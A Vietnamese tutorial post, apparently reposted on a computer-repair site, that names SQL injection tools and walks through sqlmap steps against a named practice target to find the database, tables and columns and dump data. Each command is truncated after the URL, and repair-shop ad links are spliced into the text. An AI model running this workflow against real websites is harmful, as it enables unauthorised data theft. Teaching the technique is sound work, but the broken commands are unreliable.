Web6: SQL Injection – Một Số Tool Khai Thác - Trường Tín

Web Tin Học Trường Tín có bài: Web6: SQL Injection – Một số tool khai thác Trong phần này, Quản Trị mạng sẽ giới thiệu với các bạn một số tool (công cụ) dùng để khai thác SQL Injection.

Trong phần này, Quản Trị mạng sẽ giới thiệu với những bạn một số tool (công cụ) dùng làm khai thác SQL Injection.

Hiện nay có rất nhiều công cụ quét lỗ hổng bảo mật (bao gồm SQL injection). Những công cụ này cấp phép phát giác vào khai thác lỗ hổng SQL injection khá mạnh mẽ. Một số công cụ khai thác lỗ hổng SQL injection tự động hay được sử dụng như:

• Sqlmap
• The Mole (Digging up your data)
• Havij

Ngoài ra còn có một số tool khác mà các bạn cũng có thể có thể tham khảo như: Netsparker, jSQL Injection, Burp, BBQSQL…

Xem thêm: Laptop Dell bật không lên màn hình kêu tít tít vs trung tâm sửa máy tính quận 8 vs sửa máy tính ở tại quận 11 vs

Dưới đây tôi là phần demo việc sử dụng Sqlmap để khai thác SQL injection cơ bản.

Bạn download Sqlmap tại http://sqlmap.org/

Xem thêm: cài đặt máy tính vs Máy tính bị nhiễm virus vs sửa máy tính ở tại quận thủ đức vs

Sqlmap được viết bằng ngôn ngữ Python, vì vậy để sử dụng tool này bạn cần cài đặt Python. Bạn cũng đều có thể download python tại http://www.python.org/downloads/

Đầu tiên bạn phải định vị được website mục tiêu, tại đây tôi có mục tiêu sau: http://zerocoolhf.altervista.org/level1.php?>

Bước 1 : Mở cmd và gõ lệnh như sau:

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?>

sqlmap sẽ phát hiện lỗ hổng của mục tiêu vào mang ra thông tin về lỗ hổng.

Bước 2 : Khi đã xác định được là website mục tiêu hiện diện lỗ hổng SQL injection, ta tiến hành tìm tên cơ sở dữ liệu.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?>

=> Cơ sở dữ liệu: my_zerocoolhf

Bước 3 : Sau khi xác định được tên cơ sở dữ liệu, ta sẽ tìm tiếp tên các bảng có trong cơ sở dữ liệu.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?>

=> Có 2 bảng trong cơ sở dữ liệu: auth và book

Bước 4 : Xác định tên các cột trong bảng

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?>

=> Xác định được những cột trong bảng book: author, id, price, title.

Bước 5 : Dump dữ liệu từ bảng.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?>

=> Như vậy ta đã lấy được cơ sở dữ liệu của website mục tiêu.

Trên đây là demo cơ bản về sử dụng sqlmap để khai thác lỗi SQL injection, các bạn cũng có thể có thể tìm biết thêm các tùy chọn của sqlmap tại https://github.com/sqlmapproject/sqlmap/wiki/Usage để hỗ trợ việc khai thác SQL injection.

Xem thêm: cài lại win giá rẻ vs sửa laptop giá rẻ vs Sửa máy tính bị giựt chớp chớp vs

• Web2: SQL Injection – Các cách khai thác khác
• Web1: SQL Injection – Con đường khai thác thông dụng nhất
• Web5: SQL injection – Một số kỹ thuật băng qua cơ chế lọc
• Web3: SQL injection – Các hướng khai thác

sql injection,khai thác sql injection,khai thác user input,tấn công sql injection

Nội dung Web6: SQL Injection – Một số tool khai thác được tổng hợp sưu tầm biên tập bởi: Tin Học Trường Tín. Mọi ý kiến vui lòng gửi Liên Hệ cho truongtin.top để điều chỉnh. truongtin.top tks.